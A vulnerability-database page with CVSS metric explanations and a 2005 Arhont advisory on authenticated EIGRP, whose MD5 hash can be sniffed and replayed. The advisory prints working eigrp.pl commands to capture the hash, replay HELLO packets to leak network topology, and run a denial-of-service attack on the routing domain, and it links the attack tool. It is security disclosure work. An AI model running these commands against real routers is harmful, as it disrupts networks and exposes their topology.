The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
Low
C
There is some impact on confidentiality, but the attacker either does not gain control of any data, or the information obtained does not have a significant impact on the system or its operations.
Integrity
Low
I
Modification of data is possible, but the attacker does not have control over what can be modified, or the extent of what the attacker can affect is limited. The data modified does not have a direct, serious impact on the system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Arhont Ltd.- Information Security
Arhont Advisory by: Arhont Ltd
Advisory: Authenticated EIGRP DoS / Information leak
Class: design bug
Version: EIGRP version 1.2
Model Specific: Other versions might have the same bug
DETAILS:
From experiments with capturing and replaying back at the router a
variety of authenticated EIGRP packets, it appears that the MD5
algorithm is ran against the following packet fields: Opcode, AS number,
Flags, Sequence Number, Nexthop. Thus, the presence of Message
Authentication Code (MAC) does not stop attackers from replaying HELLO
packets back at the router. The only condition is needed is to sniff the
hash and throw it back at the EIGRP routers. An example of this would be
1. Sniff
arhontus# ./eigrp.pl --sniff --iface eth0
<skip>
<<<Authentication data: 0002>>>
Size: 40
Key ID: 2
MD5 key digest: efe07403446c77a9697fe5753f79e52
Key in one string (Copy & paste to replay)
00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52
2. Replay
arhontus#./eigrp.pl --hello --auth
00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52
The packets are received well and trigger back an EIGRP update to sniff
it and find more about the network topology:
061751: 04:13:46: EIGRP: received packet with MD5 authentication, key id = 2
061752: 04:13:46: EIGRP: Received HELLO on Ethernet0/0 nbr 192.168.66.112
061753: 04:13:46: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0
peerQ un/rely 0/1
061754: 04:13:46: EIGRP: Sending UPDATE on Ethernet0/0 nbr
192.168.66.112, retry 2, RTO 4500
061755: 04:13:46: AS 1, Flags 0x9, Seq 2162/0 idbQ 1/0 iidbQ un/rely
0/0 peerQ un/rely 0/1 serno 3-8
As a result of it, additional information about the EIGRP domain can be
collected from the triggered UPDATE packets.
Besides, using this method the FX EIGRP/ARP DoS attack (BID 6443) can be
ported to the authenticated EIGRP routing domain. This is done by
combining --hellodos and --auth <captured hash> flags when running the
attack using our EIGRP packet generator. The attack appears to be more
efficient, than the original attack described by FX, since the routers
recover much slower. This is possibly due to the additional overhead of
processing the authentication information. An example of the attack
command killing the network would be
arhontus#./eigrp.pl --hellodos 192.168.66.0 --auth
00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52
--source 192.168.66.112
Tool: http://www.hackingciscoexposed.com/tools/eigrp-tools.tar.gz
Risk Factor: Medium for DoS, Low for the Information Leak
Workarounds: Extend the Message Authentication Code onto the currently
unauthenticated EIGRP packet fields.
Communication History: sent to PSIRT on 10/10/05
*According to the Arhont Ltd. policy, all of the found vulnerabilities
and security issues will be reported to the manufacturer at least 7 days
before
releasing them to the public domains (such as CERT and BUGTRAQ).
If you would like to get more information about this issue, please do
not hesitate to contact Arhont team.*
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum